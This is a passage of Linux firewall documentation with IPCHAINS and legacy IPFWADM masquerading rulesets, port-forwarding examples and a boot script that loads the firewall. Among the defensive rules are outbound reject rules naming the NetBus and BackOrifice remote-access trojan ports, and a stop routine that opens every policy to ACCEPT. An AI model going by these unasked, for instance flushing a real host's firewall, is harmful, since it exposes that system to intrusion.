blocked. # /sbin/ipchains -A output -j REJECT -s $UNIVERSE -d $UNIVERSE $LOGGING #******************************************************************** # Forwarding Rules #******************************************************************** # echo "----------------------------------------------------------------------" echo "Forwarding Rules:" #-------------------------------------------------------------------- # Enable TCP/IP forwarding and masquerading from the Internal LAN #-------------------------------------------------------------------- # Diald Users: # # You need this rule to allow the sl0 SLIP interface to receive # traffic to then bring the interface up. # # Disabled by default # #/sbin/ipchains -A forward -j MASQ -i sl0 -s $INTLAN -d $UNIVERSE/0 #-------------------------------------------------------------------- # Port Forwarding #-------------------------------------------------------------------- # Port forwarding allows external traffic to directly connect to an INTERNAL # Masq'ed machine. An example for this is when a user needs to have external # users directly contact a WWW server behind the MASQ server. # # To use PORTFW, you need to un-# out and edit the $SECUREHOST section at # the top of the ruleset. # # NOTE: Port forwarding is well beyond the scope of this documentation to # explain the security issues implied in opening up access like this. # Please see Appendix A to read the IP-MASQ-HOWTO for a full explanation. # # Do not use ports greater than 1023 for redirection ports. # # Disabled by default. #-------------------------------------------------------------------- #echo " * Enabling Port Forwarding onto internal hosts." #/usr/sbin/ipmasqadm portfw -f #echo " * Forwarding SSH traffic on port 26 to $PORTFWIP1" #/usr/sbin/ipmasqadm portfw -a -P tcp -L $EXTIP 26 -R $PORTFWIP1 22 # #echo " * Forwarding SSH traffic on port 26 to $PORTFWIP2" #/usr/sbin/ipmasqadm portfw -a -P tcp -L $EXTIP 26 -R $PORTFWIP2 22 # #echo " * Forwarding SSH traffic on port 26 to $PORTFWIP3" #/usr/sbin/ipmasqadm portfw -a -P tcp -L $EXTIP 26 -R $PORTFWIP3 22 #-------------------------------------------------------------------- # Enable TCP/IP forwarding and masquerading from the Internal LAN #-------------------------------------------------------------------- # Turn on IP Forwarding in the Linux kernel # # There are TWO methods of turning on this feature. The first method is the # Red Hat way. Edit the /etc/sysconfig/network file and change the # "FORWARD_IPV4" line to say: # # FORWARD_IPV4=true # # The second method is shown below and can executed at any time while the # system is running. # echo " - Enabling IP forwarding." echo "1" > /proc/sys/net/ipv4/ip_forward # Masquerade from local net on local interface to anywhere. # echo " - Enable IP Masquerading from the internal LAN." /sbin/ipchains -A forward -j MASQ -i $EXTIF -s $INTLAN -d $UNIVERSE # Enabling Always Defrag for Masqueraded systems # echo " - Enable IP Always Defrag for the internal LAN." echo "1" > /proc/sys/net/ipv4/ip_always_defrag # Catch all rule, all other forwarding is denied. # /sbin/ipchains -A forward -j REJECT -s $UNIVERSE -d $UNIVERSE $LOGGING #******************************************************************** # The end #******************************************************************** echo "----------------------------------------------------------------------" echo -e "TrinityOS IPCHAINS Firewall $FWVER implemented.\n\n" -- Have the firewall ruleset automatically load: Redhat: Create the file called /etc/rc.d/init.d/firewall -- #!/bin/sh # # firewall Bring up/down networking # # chkconfig: 2345 11 89 # description: Loads a modified version of the TrinityOS rc.firewall ruleset # probe: true # Source function library. . /etc/rc.d/init.d/functions # Check that networking is up. # This line no longer work with bash2 #[ ${NETWORKING} = "no" ] && exit 0 # This should be OK. [ "XXXX${NETWORKING}" = "XXXXno" ] && exit 0 [ -x /sbin/ifconfig ] || exit 0 # See how we were called. case "$1" in start) /etc/rc.d/rc.firewall ;; stop) echo -e "\nFlushing firewall and setting default policies to ACCEPT\n" /sbin/ipchains -P input ACCEPT /sbin/ipchains -P output ACCEPT /sbin/ipchains -P forward ACCEPT /sbin/ipchains -F input /sbin/ipchains -F output /sbin/ipchains -F forward ;; restart) $0 stop $0 start ;; status) /sbin/ipchains -L ;; *) echo "Usage: firewall {start|stop|restart|status}" exit 1 esac exit 0 -- Next, make it executable: chmod 700 /etc/rc.d/init.d/firewall Lastly, enable the firewall to start automatically: chkconfig --add firewall chkconfig --level 345 firewall on Slackware: Next, append this to the end of the "/etc/rc.d/rc.local" file -- #Run the IP MASQ and firewall script /etc/rc.d/rc.firewall -- - Make the rc.firewall file executable chmod 700 /etc/rc.d/rc.firewall +-----------------------------------------------------------------------------+ | rc.firewall for MASQ setups with a STRONG IPFWADM ruleset for 2.0.x kernels | | | | *** Discontinued!!! Patch your 2.0.x kernel and use the IPCHAINS rules!! | +-----------------------------------------------------------------------------+ /etc/rc.d/rc.firewall -- #!/bin/sh #-------------------------------------------------------------------- # Version v2.97 # # NOTE to ALL IPFWADM users: # # As you all know, IPFWADM has been replaced by IPCHAINS for some time # now. I've also been updating the IPCHAINS rulesets for a while yet # the IPFWADM rulesets haven't been updated. # # Though this sucks that I have to do this, I can't maintain both. # In the future, I will REMOVE these rulesets though I will make them # available via a different URL. # # ** BUT... there is a kernel patch to get IPCHAINS running on 2.0.x # kernels. Please see [Section 5] for the URL and use IPCHAINS from # now on. Ok? # # v2.97 - Deleted the DHCPcd commands as the syntax was old an misleading. Update # to IPCHAINS. # # v2.96 - Added blurbs and scripts in the EXTIP, EXTBROAD, and DGW variable areas that # DHCP users should use "dhcpcd" with the -c option to re-run # the ruleset upon lease renews. It is also mentioned that both # DHCP and PPP users need to get their EXTBROAD and DGW addresses # dynamically. # - Changed the debug system to re-create the debug log each time # (removed one of the >'s at the top of the debug setup) # # v2.95 - Added a /0 to the final OUTPUT reject rule. It was implictly there but its good # for documentation reasons. There were also a few IMPUT rules that DENYed # instead of REJECTed traffic for spoofed traffic, etc. Fixed. # I also noted that the automatic $extbroad varible will only be properly set if # you have a typical 255.255.255.0 netmask. If you don't, you'll have to statically # define it vs. use the automatic method. # v2.94 - Added explict INPUT filters for NFS and OUTPUT filters for Mountd and RPC # v2.93 - Added explict OUTPUT filters for the BackOrofice and NetBus Windows trojans # v2.92 - Moved the default policy settings and INPUT/OUTPUT/FORWARD flush from # the top of each section to the top top of the entire ruleset.# v2.91 # v2.91 - Added more firewall DENY rules to stop Xwindows ports 6001-6007 # v2.90 - Changed the default policies from DENY to REJECT. # v2.80 - Clarified the input/output rules for HTTP to use the -W interface option and # added a #ed out rule for allowing HTTP traffic directly to the Linux box # from the Internet. # v2.75 - Added and commented on the enabling of multicast traffic # - Caught a serious typo: -V CANNOT have a subnet mask appended to it. Though # this is inconsitant with the other commands, this has been confirmed. # v2.71 - Redirectted the rc.firewall debugging info to /tmp/rc.firewall.dump # v2.70 - Added commented out debugging echo statements right after the enviroment vars # v2.65 - Removed the /32 bit subnet mask from the intip, extip, dgw, secondarydns, # and securehost variables and manually placed them back within the rulesets # themselves. This is for users who use DHCP and/or PPP that wouldn't get the # correct netmask. Also, the netmask built into these variables would break # the IPPORTFW section. # - Added the LOOPBACK variable for better readibilty # - Cleaned the comment sections a little # # v2.60 - Added #'ed out rules to support the Linux box getting addressed via DHCP # v2.51 - Corrected the vars passed to PPPd as shown bellow in the comments section # v2.50 - Deleted an already #ed out line to allow in ALL incoming # traffic. # - Added a /32 bit subnet mask to the intip, extip, dgw, secondarydns, # and securehost variables. Because of this, I then deleted a few stray # and possibly incorrect /24 and /32 bit masks on various IPFWADM rules # - Cleaned up (split up) the explict INPUT section for internal and external # hosts. # - Cleaned up the IPPORTFW area to use all environment vars and added the # $portfwip var. # - Deleted a duplicate line for the "outgoing from local net on remote interface, # stuffed masquerading, deny" ruleset # # v2.45 - Added the enviroment variables that PPPd passes to ease the # use of IPFWADM firewalls # v2.40 - Change the default behavior of IPORTFW to disabled # - Made some clarifications for dynamically addressed users and # the "extif" variable. # v2.30 - Commented and changed the unrestricted ports to 1024-65535 # since SSH sometimes creates connections at port 1023 # - Added #'ed out IPFWADM statements to do non-logged filtering # of BOOTP (ports 67-68), Samba (ports 137-138), RIP # (port 520), and SNMP (port 161) # - Added TCP support for DHCP # v2.25 - Rearranged the ordering and description of the IPFWADM enviro variables # - Added #'ed out IPFWADM statements for WWW access to the world # v2.20 - Addition of IPPORTFW commands # v2.10 - Disabled ALL outbound Xwindows (Xwin uses port 6000) which was # previously allowed since its in the >1024 port range. Gotcha! # v2.00 - Totally re-written and MUCH stronger # v1.00 - Oringial draft #-------------------------------------------------------------------- # ++ Best viewed in a window at 90+ columns # # This script was adapted from Ambrose's IPMASQ-HOWTO and several # other resources including: # # - Me # # **Note**: This config ASSUMES: # # 1) that you have your private LAN addressing set as # 192.168.0.x # 2) Your internal LAN is on eth1 # 3) Your external LAN is on eth0 # 3) Your static IP address is 100.200.0.212 # * If you get your external IP address via DHCP, you # will need to un-comment (un-#) the "DHCP - Client" ruleset # # Obviously, this config won't be totally correct for your # enviroment nor can your static IP address be the same # as mine! So, you might need to change the IP addresses, # internal/external interface names, un-comment out the #'ed out DHCP client # lines, etc. # # --------------------------------------------------------------- # # This config also handles both IP spoofing and stuffed routing # and IP Masquerading. Anything not explictly allowed is # REJECTED. Rejecting traffic is better than DENYING it since # it makes the IPFWADM'ED machine look like its not CAPABLE of # doing that particular protocol! # # ***PPP and DHCP USERS*** # # 1) All PPP and DHCP users that get Dynamic IP address should # # out the "extip" variable a page or so down and then un-# out the # following command for your dynamic IP address: # # NOTE: DHCP users will need to replace the "ppp0" interface name with # the interface name of your external Internet interface. # # extip=`/sbin/ifconfig | grep -A 4 ppp0 | awk '/inet/ { print $2 } ' | sed -e s/addr://` # # # 2. Create the /etc/ppp/ip-up script file to execute this ruleset: # # /etc/ppp/ip-up # -- # #!/bin/sh # /etc/rc.d/rc.firewall # -- # # NOTE: When PPPd runs the /etc/ppp/ip-up script, it passes several # enviroment variables which can help bring up the script. # Though I haven't updated my doc to use these variables, I will # at a future date: # # $1 = Interface being brought up (e.g. ppp0) # $2 = TTY device being used (/dev/modem) # $3 = Terminal speed (38400) # $4 = IP address of my local PPP interface # $5 = IP address of the remote P-t-P link (default gw) # $6 = This is the IPPARM string that is passed from the # options file for any ip-up specific use # # # 3. Now make this new script executable by running "chmod 700 /etc/ppp/ip-up" #--------------------------------------------------------------------------- #Enviroment Variables - Change to suit your enviroment # #Specification of the LOOPBACK interface loopback="127.0.0.1" #Specification of the INTERNAL NIC intif="eth1" #The IP address on your INTERNAL nic intip="192.168.0.1" #IP network address of the INTERNAL net intnet="192.168.0.0" #IP address of an internal host that should have IPPORTFW forward traffic to portfwip="192.168.0.20" #Specification of the EXTERNAL NIC # # PPP Users: If you are using the Dynamic PPP "extif" script from above, # make sure to comment the below line out so it doesn't override it. # # If you want to use the PPPd variables, change this to read: # # extip=ppp0 # extif="eth0" #The IP address you get from the Internet # # PPP users: If you are getting dynamic address, either use the "extip" script # from the header above or if you want to use the PPPd variables, # change this to read: # # EXTIP=`/sbin/ifconfig | grep -A 4 $EXTIF | awk '/inet/ { print $2 } ' | sed -e s/addr://` # # NOTE: DHCP users should also update the script that runs DHCP to # use "dhcpcd" instead of other solutions like RH6's # "pump" DHCP solution and also have dhcpcd load. # # This will let the firewall re-run upon DHCP lease renews # just in case you get a different IP address. # extip="100.200.0.212" #The IP broadcast address of the external net # # PPP users: If you are getting dynamic address, use the the PPPd variables. # Change "extbroad" to read (this make an assuption but it should # be a safe assumption): # extbroad=`echo $4 | cut -d '.' -f 1-3`.255 # # NOTE: This method will only work for typical 255.255.255.0 netmasks, # if you get other masks such as a 255.255.252.0, you will have to # statically define it like it is now instead of using the dynamic # setup. # extbroad="100.200.0.255" #IP address of the default gateway on the EXTERNAL NIC # # PPP and DHCP users: If you are getting dynamic address, use the the PPPd variables. # Change "dgw" to read: # # dgw=`/sbin/ifconfig | grep -A 4 ppp0 | awk '/gateway/ { print $2 } ' | sed -e s/addr://` # dgw="100.200.0.1" #IP Mask for ALL IP addresses universe="0.0.0.0" #IP Mask for BROADCAST broadcast="255.255.255.255" #Specification of HIGH IP ports # NOTE: Notice that this STARTS at 1024 and NOT at 1023 which it should. # for some reason SSH sometimes initiates connections at 1023 which # is a TCP violation but shit happens. # unprivports="1024:65535" #Specification of backup DNS server secondarydns="102.200.0.25" #Specifically allowed external host - secure1.host.com securehost="200.211.0.40" #--------------------------------------------------------------------------- # Debugging Section: If you are having problems with the firewall, uncomment # out (un # out) the follow echo lines and then re-run # the firewall to make sure that the rc.firewall is # getting the right info. # #echo Loopback IP: $loopback >> /tmp/rc.firewall.dump #echo Internal interface name: $intif >> /tmp/rc.firewall.dump #echo Internal interface IP: $intip >> /tmp/rc.firewall.dump #echo Internal interface net: $intnet >> /tmp/rc.firewall.dump #echo ----------------------------------------------------- >> /tmp/rc.firewall.dump #echo External interface name: $extif >> /tmp/rc.firewall.dump #echo External interface IP: $extip >> /tmp/rc.firewall.dump #echo External interface broadcast IP: $extbroad >> /tmp/rc.firewall.dump #echo External interface default gateway: $dgw >> /tmp/rc.firewall.dump #echo Internet IP to be portforwarded to: $portfwip >> /tmp/rc.firewall.dump #echo ----------------------------------------------------- >> /tmp/rc.firewall.dump #echo External secondary DNS (optional): $secondarydns >> /tmp/rc.firewall.dump #echo External secured host (optional): $securehost >> /tmp/rc.firewall.dump #--------------------------------------------------------------------------- # For a nice display echo " " #Multicast is a powerful, yet seldom used aspect of TCP/IP for multimedia # data. Though it isn't used much now (because most ISPs don't enable # multicast on their networks, it will be very common in a few more # years. Check out www.mbone.com for more detail. # # NOTE: Adding this feature is OPTIONAL # echo "Adding multicast route.." /sbin/route add -net 224.0.0.0 netmask 240.0.0.0 dev $extif echo "Enabling IP Masquerading.." echo "1" > /proc/sys/net/ipv4/ip_forward #--------------------------------------------------------------------------- # Masq timeouts # ------------- # # Set timeout values for masq sessions (seconds). # I only did this because my telnet connections would drop after inactivity # of 15 mins. echo "Changing IP MASQ Timeouts.." # 2 hrs timeout for TCP session timeouts # 10 sec timeout for traffic after the TCP/IP "FIN" packet is received # 60 sec timeout for UDP traffic (MASQ'ed ICQ users must enable a 30sec # firewall timeout in ICQ itself) /sbin/ipfwadm -M -s 7200 10 60 #--------------------------------------------------------------------------- #--------------------------------------------------------------------------- # Masq Modules # ------------- # echo "Loading MASQ modules.." #/sbin/modprobe ip_masq_cuseeme /sbin/modprobe ip_masq_ftp #/sbin/modprobe ip_masq_irc #/sbin/modprobe ip_masq_quake #/sbin/modprobe ip_masq_vdolive #/sbin/modprobe ip_masq_raudio #--------------------------------------------------------------------------- #Set all default policies to REJECT and flush all old rules: echo "Set all default policies to REJECT and flush all old rules" #Change default policies /sbin/ipfwadm -I -p reject /sbin/ipfwadm -O -p reject /sbin/ipfwadm -F -p reject #Flush all old rulesets /sbin/ipfwadm -I -f /sbin/ipfwadm -O -f /sbin/ipfwadm -F -f #--------------------------------------------------------------------------- echo "Enabling general INPUT on the internal LAN.. line 74" #--------------------------------------------------------------------------- # INCOMING traffic on the INTERNAL LAN network # -------------------------------------------- # local interface, local machines, going anywhere is valid /sbin/ipfwadm -I -a accept -V $intip -S $intnet/24 -D $universe/0 # remote interface, claiming to be local machines, IP spoofing, get lost & log /sbin/ipfwadm -I -a reject -V $extip -S $intnet/24 -D $universe/0 -o # loopback interface is valid. /sbin/ipfwadm -I -a accept -V $loopback -S $universe/0 -D $universe/0 # DHCP - SERVER - to serve out DHCP addresses on the internal LAN 67=bootps 68=bootpc /sbin/ipfwadm -I -a accept -W $intif -P udp -S $universe/0 bootpc -D $broadcast/0 bootps /sbin/ipfwadm -I -a accept -W $intif -P tcp -S $universe/0 bootpc -D $broadcast/0 bootps ## DHCP - CLIENT - if you get a dynamic IP address for your ADSL or Cablemodem connection #/sbin/ipfwadm -I -a accept -W $extif -P udp -S $universe/0 bootps -D $broadcast/0 bootpc #/sbin/ipfwadm -I -a accept -W $extif -P tcp -S $universe/0 bootps -D $broadcast/0 bootpc echo "Enabling general INPUT on the external LAN.. line 94" #--------------------------------------------------------------------------- # INCOMING traffic on the EXTERNAL LAN network # -------------------------------------------------------------------------- # # Questionable... ??? # /sbin/ipfwadm -I -a accept -V $extip -P -k -S $universe/0 -D $intnet/24 $unprivports #----------- # ICMP: Allow ICMP from the local default GW /sbin/ipfwadm -I -a accept -W $extif -P icmp -S $dgw/32 -D $extip/32 ## ICMP: Allow ICMP from the universe but LOG it .. nice thought but unless you ## can figure out how to ignore REPLIES.. this is too much logging! #/sbin/ipfwadm -I -a accept -W $extif -P icmp -S $universe/0 -D $extip/32 -o /sbin/ipfwadm -I -a accept -W $extif -P icmp -S $universe/0 -D $extip/32 # NTP: Allow NTP updates tcp from any host /sbin/ipfwadm -I -a accept -W $extif -P tcp -S $universe/0 -D $extip/32 ntp # IDENT: Allow IDENT on ALL interfaces but disable it in /etc/inetd.conf /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $universe/0 113 # DNS Lookups & Zone transfers: Since this site is an authoritative DNS server, we must # open up DNS to the public on ALL interfaces /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $universe/0 53 /sbin/ipfwadm -I -a accept -P udp -S $universe/0 -D $universe/0 53 # SMTP MAIL: Since this site is an authoritative SMTP server, allow it in on ALL # interfaces. # # NOTE: No specific -W interfaces are given since I want SMTP to be available # from ALL interfaces and not just one specific one. # /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $extip/32 smtp # WWW: Allow HTTP traffic. By default, allow all HTTP traffic from the Internal # LAN but DISABLE it from the Internet. If you also require HTTP access # from the Internet, uncomment the #ed out rule below. # #Internal LAN: /sbin/ipfwadm -I -a accept -W $intif -P tcp -S $intnet/24 -D $intip/32 www # #Internet: #/sbin/ipfwadm -I -a accept -W $extif -P tcp -S $universe/0 -D $extip/32 www # NFS /sbin/ipfwadm -I -a reject -W $extif -P tcp -S $universe/0 -D $extip/32 2049 /sbin/ipfwadm -I -a reject -W $extif -P tcp -S $universe/0 2049 -D $extip/32 # HIGH PORTS: Enable all HIGH ports for reply tcp/udp traffic /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $extip/32 $unprivports /sbin/ipfwadm -I -a accept -P udp -S $universe/0 -D $extip/32 $unprivports echo "Enabling explict INPUT on the -INTERNAL- LAN.. line 136" ############################################################################## # Begin Explict IP INPUT allows on the INTERNAL LAN network: ############################################################################## # ### NOTE: copy a set of the following (3) lines and modify them to reflect any # additional internal hosts you want to be able to access your Linux # box. These examples allow FTP, FTP-DATA, SSH, and Samba. # # If you want to enable TELNET access, just append the word "telnet" after # the word "ssh" #coyote /sbin/ipfwadm -I -a accept -W $intif -P tcp -S 192.168.0.2/32 -D $intip/32 ftp ftp-data ssh /sbin/ipfwadm -I -a accept -W $intif -P udp -S 192.168.0.2/32 -D $intip/32 137 138 139 #spare /sbin/ipfwadm -I -a accept -W $intif -P tcp -S 192.168.0.9/32 -D $intip/32 ftp ftp-data ssh /sbin/ipfwadm -I -a accept -W $intif -P udp -S 192.168.0.9/32 -D $intip/32 137 138 139 #spare2 /sbin/ipfwadm -I -a accept -W $intif -P tcp -S 192.168.0.10/32 -D $intip/32 ftp ftp-data ssh /sbin/ipfwadm -I -a accept -W $intif -P udp -S 192.168.0.10/32 -D $intip/32 137 138 139 echo "Enabling explict INPUT on the -EXTERNAL- LAN.. line 136" ############################################################################## # Begin Explict IP INPUT allows on the EXTERNAL LAN network: ############################################################################## # ### NOTE: If you need to need to have more than just one remote Secure Host # into your Linux box, copy the set of (2) lines below and modify # them to reflect their proper IP addresses. This example allows # SSH and POP3 in. In addition to this "Explict IP INPUT" exception, # you will need to explictly allow this remote secure # host traffic to be let -OUT- of the firewall. See the "Explict IP # OUTPUT allows" later in this ruleset to complete the firewall ruleset. # ### NOTE2: If you want to enable TELNET access in addition to SSH and POP3, just # append the word "telnet" after the word "pop-3" # ### NOTE3: If you want to forward FTP traffic, you will need to install a different # ip_masq_ftp module. Please see the IP-MASQ-HOWTO for full details. #secure1.host.com /sbin/ipfwadm -I -a accept -W $extif -P tcp -S $securehost/32 -D $extip/32 ssh pop-3 # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # IPPORTFW Re-directions.. # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # Port forwarding allows people from the outside to directly connect to a machine # on the MASQed side. An example of this is the need for people to directly # contact an FTP server on the MASQed network from the Internet. # NOTE: Do *NOT* use ports greater than 1023 for redirection ports. # # I used to use ports 2312 for TELNET redirection but I figured out # that with ports > 1023, all my IPFWADM rulesets were being # ignored and all Internet hosts could hit my re-directed server! # # Why? Due to the default behavior of TCP/IP and MASQing, you # have to allow all ports > 1023 through the firewall. ##### NOTE: Un-#ed out these statements if you want to enable IPPORTFW #echo "Enabling IPPORTFW Redirection on the external LAN.. line 229" #/usr/local/sbin/ipportfw -C #/usr/local/sbin/ipportfw -A -t$extip/2112 -R $portfwip/21 #/usr/local/sbin/ipportfw -A -t$extip/2312 -R $portfwip/23 #/usr/local/sbin/ipportfw -A -t$extip/8012 -R $portfwip/80 # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # END IPPORTFW Re-directions.. # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # ******************************************************************************** # ** Uncomment these non-logging IPFWADM rules if they apply to your enivroment ** # ******************************************************************************** # Reject all stray BOOTP traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 68 # Reject all stray Samba traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 -D $universe/0 137 138 139 # Reject all stray RIP traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 -D $universe/0 520 # Reject all stray SNMP traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 -D $broadcast/0 161 # Final INPUT Rule # # catch all rule, all other incoming is denied and logged. pity there is no # log option on the policy but this does the job instead. /sbin/ipfwadm -I -a reject -S $universe/0 -D $universe/0 -o echo "Enabling general OUTPUT on the internal LAN.. line 174 " #--------------------------------------------------------------------------- # OUTGOING traffic on the INTERNAL LAN network # -------------------------------------------- # local interface, any source going to local net is valid /sbin/ipfwadm -O -a accept -V $intip -S $universe/0 -D $intnet/24 # outgoing to local net on remote interface, stuffed routing, deny & log /sbin/ipfwadm -O -a reject -V $extip -S $universe/0 -D $intnet/24 -o # outgoing from local net on remote interface, stuffed masquerading, deny /sbin/ipfwadm -O -a reject -V $extip -S $intnet/24 -D $universe/0 -o #DISABLED - Too open ## anything else outgoing on remote interface is valid #ipfwadm -O -a accept -V $extip -S $extip/32 -D $universe/0 # loopback interface is valid. /sbin/ipfwadm -O -a accept -V $loopback -S $universe/0 -D $universe/0 # DHCP - SERVER - to serve out DHCP addresses on the internal LAN 67=bootps 68=bootpc /sbin/ipfwadm -O -a accept -W $intif -P udp -S $intip/32 bootps -D $broadcast/0 bootpc /sbin/ipfwadm -O -a accept -W $intif -P tcp -S $intip/32 bootps -D $broadcast/0 bootpc ## DHCP - CLIENT - if you get a dynamic IP address for your ADSL or Cablemodem connection #/sbin/ipfwadm -O -a accept -W $extif -P udp -S $universe/0 bootpc -D $broadcast/0 bootps #/sbin/ipfwadm -O -a accept -W $extif -P tcp -S $universe/0 bootpc -D $broadcast/0 bootps echo "Enabling general OUTPUT on the EXTERNAL LAN.. line 204 " #--------------------------------------------------------------------------- # OUTGOING traffic on the external LAN network # -------------------------------------------- # ICMP: Allow ICMP traffic out /sbin/ipfwadm -O -a accept -P icmp -S $universe/0 -D $universe/0 # NTP: Allow NTP updates tcp from any host /sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 ntp -D $universe/0 # IDENT: Allow IDENT out but have it disabled in /etc/inetd.conf /sbin/ipfwadm -O -a accept -P tcp -S $universe/0 113 -D $universe/0 # DNS Lookups & Zone transfers: Since this site is an authoritative DNS # server, we must open up DNS to the public # on ALL interfaces # - You do not need port 42? /sbin/ipfwadm -O -a accept -P tcp -S $extip/32 53 -D $universe/0 /sbin/ipfwadm -O -a accept -P udp -S $extip/32 53 -D $universe/0 # SMTP MAIL: Since this site is an authoritative SMTP server, allow it in on ALL # interfaces # # NOTE: No specific -W interfaces are given since I want SMTP to be available # from ALL interfaces and not just one specific one. # /sbin/ipfwadm -O -a accept -P tcp -S $extip/32 smtp -D $universe/0 # WWW: Allow HTTP traffic. By default, allow all HTTP traffic from the # Internal LAN but DISABLE it from the Internet. If you also require # HTTP access from the Internet, uncomment the #ed out rule below. # #Internal LAN: /sbin/ipfwadm -O -a accept -W $intif -P tcp -S $intip/32 www -D $intnet/24 # #Internet: #/sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 www -D $universe/0 # RPC - reject /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 111 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 111 -D $universe/0 -o # Mountd - reject /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 635 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 635 -D $universe/0 -o # PPTP - reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 1723 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 1723 -o # Remote Winsock - Reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 1745 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 1745 -o # NFS - Reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 2049 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 2049 -D $universe/0 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 2049 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 2049 -D $universe/0 -o # PcAnywhere - Reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 5631 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 5631 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 5632 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 5632 -o # Xwindows - Deny /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6000 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6001 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6002 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6003 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6004 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6005 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6006 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6007 -o # /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6000 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6001 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6002 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6003 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6004 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6005 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6006 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6007 -o # NetBus: REJECT Netbus and LOG it /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 12345 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 12346 -o # BackOrofice: REJECT BO on LOG it /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 31337 -o # HIGH PORTS: Enable all HIGH ports for reply tcp/udp traffic /sbin/ipfwadm -O -a accept -P tcp -S $extip/32 $unprivports -D $universe/0 /sbin/ipfwadm -O -a accept -P udp -S $extip/32 $unprivports -D $universe/0 echo "Enabling explict OUTPUT on the external LAN.. line 231" ############################################################################## # Begin Explict IP OUTPUT allows on the EXTERNAL LAN network: ############################################################################## # ### NOTE: If you need to need to have more than just one remote Secure Host # into your Linux box, copy the set of (2) lines below and modify # them to reflect their proper IP addresses. This example allows # FTP, FTP-DATA, SSH, and POP3 out. In addition to this "Explict IP # OUTPUT" exception, you will need to explictly allow this remote secure # host traffic to be let -IN- to the firewall. See the "Explict IP # INPUT allows" previously in this ruleset to complete the firewall # ruleset. # ### NOTE2: If you want to enable TELNET access in addition to FTP, FTP-DATA, # and POP3, just append the word "telnet" after the word "pop-3" #secure1.host.com /sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 ftp ftp-data ssh pop-3 -D $securehost/32 $unprivports # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############################################################################## # End Explict IP OUTPUT allows: ############################################################################## # catch all rule, all other outgoing is denied and logged. pity there is no # log option on the policy but this does the job instead. # # This should catch everything including SAMBA an all non-explictly allowed # TELNET, FTP, FTP-DATA, SSH, etc. /sbin/ipfwadm -O -a reject -S $universe/0 -D $universe/0 -o echo "Enabling MASQ on the external LAN.. line 250" #--------------------------------------------------------------------------- # Forwarding traffic from the internal LAN network # -------------------------------------------- # # Masquerade from local net on local interface to anywhere. /sbin/ipfwadm -F -a masquerade -W $extif -S $intnet/24 -D $universe/0 # catch all rule, all other forwarding is denied and logged. pity there is no # log option on the policy but this does the job instead. /sbin/ipfwadm -F -a reject -S $universe/0 -D $universe/0 -o #-------------------------------------------------------------------- # For a nice display echo " " -- Redhat: edit /etc/rc.d/init.d/network and find where the [STAR] block ends (search for the sentance "stop") and ADD the following just above the double semi-colons ";;" /etc/rc.d/init.d/network 